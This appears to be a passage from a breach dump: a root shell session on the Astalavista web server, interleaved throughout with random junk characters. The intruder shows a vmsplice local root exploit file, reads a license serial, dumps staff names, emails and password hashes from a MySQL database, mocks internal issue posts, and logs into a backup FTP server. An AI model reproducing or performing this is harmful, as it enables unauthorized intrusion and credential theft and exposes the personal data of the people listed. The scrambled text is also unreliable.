-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql! E1 m. a% z% d6 `% k0 D: R3 q8 d! Y, e
drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system
( l- t0 C# w( F/ ^: {-rw——- 1 com com 21880 Jun 2 08:07 .bash_history9 k. [ a9 @' w7 j. }
-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout1 M0 o/ x; P" U3 ~+ R1 [
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile8 b+ F1 p: i6 P# s
-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc* \3 @6 ]' o' C4 J! w$ {
drwx–x–x 3 com com 4096 Jan 29 2008 domains6 }% L' O4 ^/ e! c
-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed/ `& }: m( p, `% [/ [
drwxrwx— 3 com mail 4096 Jan 6 19:24 imap
/ u; T% e$ |) O9 x-rw——- 1 com com 69 Nov 18 2008 .lesshst
$ Y3 L: h0 d3 i( s7 B* Ydrwx—— 2 com com 4096 Sep 24 2007 mail# Z( t) n' [3 Z
-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history
, P$ l7 p# U7 T) Ldrwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp
0 v( r; R0 e8 ~" \lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html& H9 |# \" @1 b
-rw-r—– 1 com mail 34 Sep 24 2007 .shadow" L$ P+ X& P ^2 P
drwx—— 2 com com 4096 Aug 26 2008 .ssh/ |! g! W- p; W8 H% K
-rwx—— 1 com com 8515 Feb 10 2008 t5 {5 o9 R) r8 H2 Z) P
-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c7 G2 T& R8 {! f) O: x4 H7 x
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp
' [ G- n6 Y+ B7 F-rw-rw-r– 1 com com 617 May 20 2008 .toprc9 m3 W' Q0 k( ] w* q' P
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql$ @$ D% Z( b/ e$ J7 l4 n. P1 W
-rw——- 1 com com 16629 Mar 28 21:46 .viminfo2 C0 u" W* Z( I
-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc: T. w/ `$ Y/ E8 O9 r7 V
% c2 E/ h8 ]# nsh-3.2# head t.c
Z) v3 e9 m, z" M, G( ?1 _/*" y7 W& Q& y" J% ~. o* W8 p
* jessica_biel_naked_in_my_bed.c
( Y* \. w; A7 D6 j*' o! Y$ I# d( z' D, A
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
! g9 C1 W( @( p* X d3 C* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.- C: u9 k" G9 @- T5 [3 i7 s. y
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
1 ^% L6 Z$ V- V: |3 f. m*
, {, u, C# e7 R* Linux vmsplice Local Root Exploit3 D" D# Z0 K- ?, z* p/ d
* By qaaz' |" o5 f2 E. U( W
*
" A* ]8 p8 Z: f6 X" |
& x: j- ?' Z4 r6 p4 vsh-3.2# cd /' o K5 s& }. U' C( {* m% I2 `8 s
sh-3.2# ls -la/ X5 d2 s! M6 `( e/ ~ D- m
total 360
1 z0 J9 n( R* @1 d5 c/ fdrwxr-xr-x 25 root root 4096 Jun 3 02:43 .
, r" R( ?! q9 e! C$ e2 R% Zdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..3 W9 B$ j0 Y S4 e* E) _
-rw——- 1 root root 10240 Jun 3 02:39 aquota.group% o p6 Y4 j i" C* @+ F
-rw——- 1 root root 10240 Jun 3 02:39 aquota.user
6 K; C. `& Y* J/ Y5 i0 a5 t9 Q5 F-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db
. ^% ?: u7 E# u$ g$ q' D0 A+ h- {-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck
# y" ~0 t( {( f-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel
" u8 u, O+ R4 O# Kdrwxr-xr-x 3 root root 4096 Dec 29 2007 backup; e- d8 f% m7 t: _ I+ U
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin! D# `, _1 w- K3 ]; ]
drwxr-xr-x 5 root root 4096 Jun 2 14:06 boot1 a3 ?! a6 Y/ t/ @ D
drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev
* @1 f+ {) X- I' R* s) f- |drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc E% P1 t* ]" k ]4 | L
drwxr-xr-x 14 root root 4096 Mar 11 17:56 home6 F) x- x5 R; ?+ W
-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf( V, x( y8 G- H) \4 w. y: m3 S
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib8 Y2 [. z/ j: F, r% W
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib645 T# S( x/ v8 @! E" b0 A, I$ \
drwx—— 2 root root 16384 Sep 11 2007 lost+found
8 \3 l1 X2 _2 @- Ndrwxr-xr-x 2 root root 4096 Mar 11 17:56 media
( `. T* Y1 t3 wdrwxr-xr-x 2 root root 0 Jun 3 02:43 misc% l7 ?$ k1 ?: ?8 D. O
drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
5 S7 P! v6 E; [- h2 F7 p# R+ n-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg6 b' s: p" n [* L6 U
drwxr-xr-x 2 root root 0 Jun 3 02:43 net4 j$ u: T1 X. v3 ?5 G
drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt) h+ ^$ V% [$ C1 U. h) ^" @
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc- w, u6 ~+ |/ L4 ?
drwxr-x— 15 root root 4096 Jun 4 08:40 root
- E) b u6 Y& p* |8 Ldrwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
9 P1 L# j4 m- m* ]3 J) _* b @drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux$ t$ x2 [2 W6 l6 y, U/ \* m# G
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv! y! P' @8 i# ^) }
drwxr-xr-x 11 root root 0 Jun 3 02:42 sys
: I! Z2 H7 u& P2 \9 _drwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp d0 W" d) e( o
drwxr-xr-x 16 root root 4096 Jun 2 13:56 usr" K$ S8 g0 n' d
drwxr-xr-x 26 root root 4096 Jun 4 03:16 var
5 k) T n4 a1 T! R; ^, C% | e7 G1 w# d( }, Y2 U$ I0 d
sh-3.2# cd opt
8 E' s6 R) }4 \/ c$ D5 c% I: msh-3.2# ls -la
* S( l' [7 d. L+ _; O8 vtotal 20, O; r+ R% s' P/ A( p( x) w& F
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .' z. b' `1 c1 K+ G( l" D, ^
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..5 `1 @) `4 h7 L& r1 f. u" x' V
drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws1 K4 x8 i6 g" `9 F
# r, Z0 b6 U9 K w
sh-3.2# cd lsws/
* w( j/ d# k5 m6 u# H1 Osh-3.2# ls -la
, B+ k7 [: B' r* ]; |total 108
# d( X* i* H# W' idrwxr-xr-x 15 root root 4096 Mar 20 2008 ." g5 ]/ V" z6 C2 T1 N
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..6 Q' n3 g& f) }; W
drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons. Z+ t1 r" }( V: Y; ^
drwxr-xr-x 13 root root 4096 May 29 15:10 admin
) P [ C; j, {9 p+ W8 S$ Ydrwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
2 M* R" d# q+ g* `+ idrwxr-xr-x 2 root root 4096 May 29 15:10 bin" c$ ?- `9 N/ U# T& @8 l
drwx—— 4 apache apache 4096 Jun 3 02:43 conf& E8 b: `1 Q6 D0 l' n
drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT
, g- r8 z' ~6 h% J% a/ z# F V. Idrwxr-xr-x 2 root root 4096 Sep 15 2008 docs2 _+ D. g7 o# H4 F0 n- J) N$ F4 S
drwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
! }, L' N" k) a3 i/ ^8 @% ^* odrwxr-xr-x 2 root root 4096 Sep 15 2008 lib+ P+ X6 z e, M m- n! w
-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE, `4 v- k0 a/ ^9 l9 }5 l
-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP4 |' R& x! s1 \3 s8 [ Y
-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
' w k- ^4 @, w2 R6 f6 ~-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP
' E9 w6 @5 w! X4 j4 x: R+ adrwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
, ~; Y1 j+ r6 gdrwxr-xr-x 2 root root 4096 Mar 20 2008 php
& ~7 A$ F F. p) ^drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild
1 u1 r9 @+ z+ xdrwxr-xr-x 3 root root 4096 Mar 20 2008 share; Q. K: Y3 u5 m( t* t( K0 ^
-rw-r–r– 1 root root 6 May 29 15:10 VERSION
) \& `9 a9 B3 V0 q- z0 G% E5 ]% ~, r3 K$ c9 p+ k; q
sh-3.2# cd conf: X$ P- ~. y) P: l2 u- Y5 |
sh-3.2# ls -la
, b t* ~5 }, I i9 c: utotal 483 _0 R% G9 O% w! Y3 L# H
drwx—— 4 apache apache 4096 Jun 3 02:43 .2 B+ s% ]! ]+ q3 ]2 Q5 H
drwxr-xr-x 15 root root 4096 Mar 20 2008 ..
! \- ]3 X) s5 v/ g2 M3 Ldrwx—— 2 apache apache 4096 Mar 20 2008 cert
3 S) ~5 Q) B3 S5 `' v-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml
7 s- Z# V0 t2 I9 E' R8 f7 t-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
8 m9 ~2 r: q9 c, ~-rw-r–r– 1 root apache 0 Jun 3 14:11 .last
5 Z! q( s/ C6 r' j, A-rw——- 1 apache apache 256 May 29 15:10 license.key) G H- G A6 y/ g" U0 a
-rw——- 1 apache apache 256 Mar 21 2008 license.key.old
' n. x9 s8 I! x: C4 c1 U7 U% z8 ^-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties
1 b; S" l* [- L5 {- X! J& ^& C, V9 G6 o8 j-rw——- 1 apache apache 20 May 29 15:10 serial.no
. l! H" t6 C: O! J4 Adrwx—— 2 apache apache 4096 Mar 20 2008 templates
+ M% h, C) F. b1 P/ Y" R2 j$ z( `
sh-3.2# cat serial.no9 T0 J( u% k( G: ~+ H3 s7 B( r
IbDl-oVsO-CKqL-wVRa
( q- _! H$ {: l6 H( H8 U( y( ]' d5 H' M( J: c( b" d. r
sh-3.2# mysql
( ~2 T. L( G: Y# ^4 ^2 e6 l& h8 LWelcome to the MySQL monitor. Commands end with ; or \g." r. w% W+ i, }3 c5 M, K' K
Your MySQL connection id is 286844 I( P4 O) k/ K3 R' J- @6 a6 V- K
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
& a4 j# I7 ]$ q
& `( V) q* f8 e: XType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.+ v( u: C* \! b: \0 M
' y( F: K: s8 t' {; Z1 x, I+ Hmysql> show databases;- L' D* i6 \0 }0 x m+ M6 \9 P0 Y8 s
+———————–+7 m3 e7 S/ B/ K4 ~+ k9 b# _
| Database |! s" A9 \+ N. w0 x
+———————–+% a) N+ K( j! P3 Z
| information_schema |- Z7 c8 c! X3 [! O- l* l1 ~8 Z
| astanet_ads |
, B4 r* h" o# ?% f| astanet_mailing_lists |
* k( N$ } c/ O| astanet_mediawiki |. T9 V A8 d) I: o- o! x
| astanet_membersystem |; J; h! f8 ~2 x7 b9 z2 U
| com_contrexx |. Z: I( I) j! o* N' m" N
| com_contrexx2 |
6 I/ g9 H3 u5 t| com_contrexx2_live |7 [3 h/ E* j0 G
| da_roundcube |
; M: M6 X4 L6 P# }! `| dolphin |- t- x+ F+ _7 \. y. _3 ]
| ideapool | R9 D& i* j" L9 K
| mysql |6 `: P8 F- u7 @1 j7 O
| test |
# _. ?# t7 i9 g+ h* `5 B# x| yourmaster |! W1 _7 B- r4 S2 i( T
+———————–+
9 e# @7 b, m' y0 [( b14 rows in set (0.00 sec)
l4 b& }3 I* y7 x2 K& b! D% A# p* {2 j. v
mysql> use ideapool
: g# p0 w$ r7 [1 VDatabase changed8 a S" N% f, [" b+ ?
mysql> show tables;
' \9 M4 \0 h5 ~+———————————–+
% R6 u8 e1 L) [" N9 M( e2 O, g| Tables_in_ideapool |4 ]- c4 x; d. d% f" E( z
+———————————–+% R" k! u7 y$ d9 Q. i
| eventum_columns_to_display |; a; o l1 `4 p% {5 n
| eventum_custom_field |
$ d# G5 H1 w0 S1 b" v: E6 l| eventum_custom_field_option |# R/ u/ S1 k- d$ ~/ F. U* F8 e
| eventum_custom_filter |$ Q0 y. I; p9 t, ]1 j6 O) L
| eventum_customer_account_manager |
) ^9 A; }" S4 y4 O* n3 ^| eventum_customer_note |+ q% t/ {: {8 `' a& v, k( W
| eventum_email_account |$ F5 V5 ` j8 v6 J2 f' Y
| eventum_email_draft |
; N0 D, _, ?: a' B5 H| eventum_email_draft_recipient |
6 {7 v! T# F- g$ O+ i| eventum_email_response |
' H0 R" L$ u% l2 j| eventum_faq |" b) K; z, h$ ?& x
| eventum_faq_support_level |: r T/ {! b- d" I0 ]! C
| eventum_group |5 Q/ W/ g+ ^2 \2 ]9 ]- V
| eventum_history_type |
. a4 Z5 u! {. z8 R: Z. ~: O, }& _+ e| eventum_irc_notice |
6 z+ `' |+ r' K6 `+ Q# B| eventum_issue |% D0 M4 S# R7 W4 |: v2 ~
| eventum_issue_association |5 ~* O: z5 H* R X1 k
| eventum_issue_attachment |8 S* g- z3 o! R( A
| eventum_issue_attachment_file |( s3 H7 j* t1 d7 @$ ?& a
| eventum_issue_checkin |; d# J! @2 X1 V: ]1 b Q3 m. ?
| eventum_issue_custom_field |6 x4 j y* P; V }. ?0 b+ `
| eventum_issue_history |
. C; [1 b! L f% e| eventum_issue_quarantine |( F0 S: J/ s# {# T u
| eventum_issue_requirement |
8 u& p8 n6 ]1 ~7 n7 d$ d| eventum_issue_user |
) S/ P! e- M& ^, G) w0 V/ i7 P/ `| eventum_issue_user_replier |
/ w, f9 |2 I) D h| eventum_link_filter |
& t4 @1 w" y% X, I" Z4 s* Q7 ~| eventum_mail_queue |
& v/ T2 M$ F* t+ y4 D7 Y| eventum_mail_queue_log |; E6 S* `, J( \
| eventum_news |
: z6 \. J$ Q! p/ z4 C9 h| eventum_note |( i. d, G( R1 P( G9 [
| eventum_phone_support |- G! ^ r! ?6 {- m
| eventum_project |
4 |/ i* w6 e0 ~' I& ~| eventum_project_category |" r: ]: I& o( u" Z" H. N; C
| eventum_project_custom_field |8 ^( H" d) u- j6 I6 m
| eventum_project_email_response |6 _8 M! D% O7 h& e" C9 V1 C
| eventum_project_field_display |
3 @$ ^# A6 g1 M; D) X| eventum_project_group |
% {; i9 m x# n7 P| eventum_project_link_filter |0 ^3 `( ^: S; Z. O, s: J
| eventum_project_news |6 B8 [3 c X* \2 r b4 t3 L8 D
| eventum_project_phone_category |3 N- ~4 x2 m* V6 F% ]
| eventum_project_priority |
! {) d. i0 w# F) C, @% q/ s! R5 r| eventum_project_release |
2 y: f8 t' c" w! | S1 S! a0 `# {6 \| eventum_project_round_robin |: f3 K( Y# @+ o6 s! L( {
| eventum_project_status |
% a6 t0 J- u! K e# U| eventum_project_status_date |
: ]/ t9 ?( R: I+ ]| eventum_project_user |- j. q/ v$ I& f% [
| eventum_reminder_action |
! Q" z" M- ~' p* u) B- O| eventum_reminder_action_list |
; Q1 o, }% n: |0 S2 z( e4 Q( s| eventum_reminder_action_type |: q7 r9 |1 G- X) T1 k
| eventum_reminder_field |) m) t) I; k) r+ R' ^
| eventum_reminder_history |9 l: T5 ^2 e; i8 ?8 N
| eventum_reminder_level |
8 u: D( A6 e: d| eventum_reminder_level_condition |7 y. \; }1 X3 Q6 I4 E
| eventum_reminder_operator |
8 G- F/ s T$ y p+ l$ ]| eventum_reminder_priority |5 i, w7 n, O2 p
| eventum_reminder_requirement |
- U# V( ]) S. A% j| eventum_reminder_triggered_action |
0 Z% o: y( R+ ?| eventum_resolution |3 i* Q" A, \# y; m) c' N6 w8 ?
| eventum_round_robin_user |5 l9 O1 P; N7 l7 @% i
| eventum_search_profile |. ]$ I3 A4 [: K
| eventum_status |
2 v$ V6 R* L: ]; m| eventum_subscription |0 c2 p; p/ A. w9 E
| eventum_subscription_type |8 u9 e- V2 g& l
| eventum_support_email |
, M6 u4 p; p/ k6 j1 Y$ e q| eventum_support_email_body |
3 _/ k" m/ R5 t: l' x! C| eventum_time_tracking |3 h5 v% F9 N, `4 M$ _& r
| eventum_time_tracking_category |
6 P3 V1 [ Y0 {# U/ M a. h3 || eventum_user |8 A* n" S6 @" {
+———————————–+
7 a& K% R6 {, Z2 @69 rows in set (0.00 sec)6 H+ k9 O5 [; q- o
/ G8 N) `6 [$ h: R' }mysql> describe eventum_user;/ B9 Q% |, d/ O* `& P) ]
+————————-+——————+——+—–+———————+—————-+2 C* Q% K( F# K9 L: B1 @
| Field | Type | Null | Key | Default | Extra |
) f" W8 t" u( E% U2 T+————————-+——————+——+—–+———————+—————-+
5 e7 n, D8 |9 b& I| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
9 `/ K2 g% s4 z! \+ F( u| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |
1 a+ D( l6 r7 L| usr_customer_id | int(11) unsigned | YES | | NULL | |
5 G, m T" x5 R# f8 G| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |
; [/ v) y# e1 F| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |0 ^3 M4 L# o8 @$ i
| usr_status | varchar(8) | NO | | active | |& R1 x9 ]: r; o& }5 s
| usr_password | varchar(32) | NO | | | |- e4 G0 [5 z5 M: g" d
| usr_full_name | varchar(255) | NO | | | |. A+ P7 e& q% m5 ^
| usr_email | varchar(255) | NO | UNI | | |
4 f% s; I- c) B5 b7 v| usr_preferences | longtext | YES | | NULL | |5 z+ L2 t1 ^3 J9 V% s. P" w
| usr_sms_email | varchar(255) | YES | | NULL | |
* m$ q- C: v+ a; W$ ~. F) ^, K2 Q2 _| usr_clocked_in | tinyint(1) | YES | | 0 | |
) x# l/ l c$ x| usr_lang | varchar(5) | YES | | NULL | |# _3 w( W* R+ z
+————————-+——————+——+—–+———————+—————-+) e* f* [: F g: Q. ^
13 rows in set (0.00 sec)" R- B) Q, p+ c3 g
/ w u7 E6 w" _% j" S' \' A* S9 v
mysql> select usr_full_name,usr_email,usr_password from eventum_user;! Z6 U, ?% `1 U# k( |
+———————-+——————————-+———————————-+
+ g3 u/ g" y0 A1 a) }| usr_full_name | usr_email | usr_password |
# y6 R3 h P5 I' b+———————-+——————————-+———————————-+4 b9 R9 T" S' g6 Q
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |4 s3 o P9 r4 `9 h2 _; x$ c
| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |# y0 ~% k1 Y: C- m8 a% W
| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |- G+ c9 s; H$ ~* q' C
| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
1 a9 z4 r. C" d w" O2 n4 ?# o3 Y| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |
& Z1 G. N5 G1 V' d- I# @0 l7 b| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |( l8 @8 K5 ]* P& A6 O2 A, G+ M
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
% ]9 p/ H4 i9 [9 j" S| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |3 W! n( w, T/ N( e: ]2 C# ~
| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |' t. M" q4 y; N, t! N0 ~9 a
| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |. w* b* C: d: ~2 H g) ]( ^
| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |
Y/ Z9 x$ v0 u, ~- k| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |
3 r6 F' j _! p# E: S' }/ ]; F1 Y$ m" R& ]| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
, ^7 E l0 W! j& P6 @& V0 \| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |
# y1 m, l+ b' V* h" u A x| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |* E: g7 I$ w! w% F2 c
+———————-+——————————-+———————————-+5 `/ l C% A2 v/ @. v
15 rows in set (0.00 sec)9 a- y" z2 M, l3 H$ S4 e
- W/ W3 E) }0 h9 R( X9 m1 \
mysql> select iss_description from eventum_issue where iss_id = 43;( x7 c5 r4 ]% U. `+ [/ h
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-++ K" }+ k) h0 \! n; G$ F
| iss_description
% k0 R' z* K1 r|
% k, \- [7 f: q1 K* ~4 F: ]' o' W+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+' Z. K. x0 o! N8 E' i8 [7 F! S
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be0 T- v. E& T3 E6 q
connected for 90 mins… 120mins… so what i propose is something like:
) I$ h' d# S4 U9 S" r链接标记[url]http://www.surfthechannel.com/[/url]
5 G% u, g' R% p0 v) ^/ fsince they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system- `* j* [0 U2 M
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t p9 {/ D. K6 ^. w
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off9 N' t( ]! S& I2 D3 v/ J* u
if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
* l/ r& i0 _1 Y; g. I) Z4 w6 t* M" w& R- [# X8 e
We could also put advertisement during play on the flash video player itself… extra $$…
F) F0 Z4 v9 J2 w% y3 h+ u" g
4 E; _' Q: Q3 a5 \& g2 {7 @9 |By sykadul |& f" H' l2 L1 A5 H2 K L
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+: E: S/ p# S& ^- G3 `/ H* u4 D4 P
1 row in set (0.00 sec)
/ g6 {- M2 G/ ~9 d5 a+ n% V( M d: o. \ S/ B, i& t
// Money and extra $$ is all they care about. remember that.
$ s# s/ d% R8 E/ z9 L, s1 N4 A) M0 c' g" `( b1 j. @# V0 l6 d
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
6 U/ U* B7 x' C' y8 Z6 U9 B+————————+——————————————————————————————————————————————————————————————————————————————-+
' M3 L' m1 L- [0 N Z/ N| iss_summary | iss_description 3 R" y& S; X/ E3 O
|
0 M0 B/ q2 p4 P+ b. O, Q) B& G$ K q+————————+——————————————————————————————————————————————————————————————————————————————-+7 m" x2 n& r/ v" W% V8 a. q i9 z. s
| Forum for REAL EXPERTS | Hello,' y" E' d. Z! q# r& g
3 s7 N. @3 @/ u: uIshtus and I,
. ~2 f$ w3 j* |/ g
9 U. r% d1 P0 R1 W5 eCame up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide4 U2 y& L* w% @, L2 l+ T# u7 ~6 o7 b. a
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
- s) w! S2 n0 a; n& o H: h
3 ?. j1 g" a3 D; w& ?One example a friend of mine from coresecurity.com!
" @* n! e! q. K3 r* t( v! v* P5 D/ b/ j
We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..! X/ M! A& _0 T
. ^* d& |% K" @! p|1 H4 V8 k" |5 ]( P3 H: u& N
+————————+——————————————————————————————————————————————————————————————————————————————+
# o, n$ Q7 D$ }" r. c2 B# V0 S1 row in set (0.00 sec). D% ]' @: Z8 s; z
. M- f1 S: D* o+ z// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
& _& B0 A$ i; A% j4 F
) C) G4 U3 [4 a& c- G9 O- T2 Ymysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;; i' M$ r7 u! ?8 t8 p& p- I" U
+——————+———————————————————————————————+
7 z2 [& u; E! A" z| iss_summary | iss_description |
) o6 o: b, x- B" ?+——————+———————————————————————————————+
- X) \0 p3 O& Q# F7 k0 [: d/ Q| Website guidance | Virtual Girl which guides you trought the website.
- _+ m( i' \; x
* H9 P/ A$ E6 K' z6 zWe need a girl with who you can ( talk )!!!( m% I8 D5 g- ^- [9 W7 a, s
Also for the News!6 l2 Z/ A* o) ~+ F( j
So my suggestion is a girl who read you the news loud if you like!4 o' [9 P* j* R8 z" {
you can choose between read yourselfe or she read it for you or both!& ^. s9 v' y7 A/ J
+ J! a2 \4 k: v4 Q( L
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
+ R* \3 Z8 R; |% T
2 A5 h/ G2 f7 |' k, _Have a look on the example girls!!
) O$ P5 Y0 t6 I9 c: ]7 a
' x# Q# U/ i3 z7 b2 O链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]* x0 B" H3 _( w6 ]- e& g7 q' H8 _8 d
) ]% H9 G0 {: C; ~) d7 o+ v0 |, {or that
3 L! T. o; K$ G- E/ R4 w, n/ W0 q
+ M9 w1 e# Y4 Q$ P# R* t. r链接标记[url]http://www.yellostrom.de/[/url]3 M' d+ K; N: y" R
" U2 o9 d4 I; ^& j" L- d _
|& u0 Z" u' _7 M/ a" j# A; E
+——————+———————————————————————————————+) t9 ?4 U/ Q# u$ {* V2 x3 c0 R) ^
1 row in set (0.00 sec). M1 V2 S6 O3 n
9 t+ [( N2 H, g: G0 {
// ha ha." U A: U5 J4 v) U
. K: Z) P* B/ o
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
) l4 y+ @2 u- x' t. X+————————–+———————————————————————————————————–+
& x7 H+ H9 }- W- t* E [ n| iss_summary | iss_description |
% O, K" T% n) A- p+————————–+———————————————————————————————————–+0 N. y9 v4 [3 S& c8 y Z) }
| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |- ~/ c7 T5 z) k% J, c5 t+ |2 i
+————————–+———————————————————————————————————–+. N7 K+ }! C# |" F7 F
1 row in set (0.00 sec)
8 [6 M/ Y% Y4 ?' \
' ]/ @4 ?3 B/ r. X' c4 o// LOL.2 O' h! X" s* g4 k
9 u4 q9 [8 |/ {: w
mysql> exit
9 I9 W: z/ W- Q7 S% @Bye
: Z) L+ v: c3 T3 j i! S- f4 p
+ O# u* ]+ S4 r" K6 a" psh-3.2# ftp 212.254.194.1639 [) i @7 ]. w+ {* _& l" F" }" i
Connected to 212.254.194.163.
( M5 p2 W& G ~: S* t- `220 BackupCOM_VW FTP server ready.+ Z! v6 ~ F, P; K& V
504 AUTH: security mechanism ‘GSSAPI’ not supported.( T1 H, c7 n, s) i0 I: A' L
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
; I+ k X; ]3 f O6 |KERBEROS_V4 rejected as an authentication type. H/ I3 a Q: Z7 ?6 I V2 `
Name (212.254.194.163:root): astalavista.com# C, q$ V( v& t) g$ }
331 Password required for astalavista.com.& Y! J2 g/ u9 W; h" A
Password:8 C4 U0 o0 ]- i
230 User astalavista.com logged in.
6 _5 V! X9 F4 E$ g2 }$ jRemote system type is UNIX.
8 E/ x8 W8 u5 g$ l' P$ B" a3 fUsing binary mode to transfer files.
6 h1 B5 I9 n1 }ftp> ls -la
6 h9 ?2 }) O& u5 e% v! I0 n3 n227 Entering Passive Mode (212,254,194,163,2,188), |2 B$ G" q! \9 g
150 Opening BINARY mode data connection for ‘file list’.
0 Y+ g& y; N C% `dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com7 I( k9 U7 q4 u
226 Transfer complete.
1 Y+ R0 t/ R, Rftp> cd astalavista.com
' [2 C6 g" X( U& H250 CWD command successful." m$ R) \7 Z3 N7 |6 R( N7 s, d9 f
ftp> ls -la8 G+ j7 O, w& |
227 Entering Passive Mode (212,254,194,163,2,189)
; X0 b6 f% ?' N! t3 E2 n1 s) [( G! @5 c150 Opening BINARY mode data connection for ‘file list’.8 B& e) ~- R* _% ~; m+ ? q
-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
0 C; P: M: y5 t0 J+ @* e-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz21 @7 P' @2 S) I7 I @" U
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
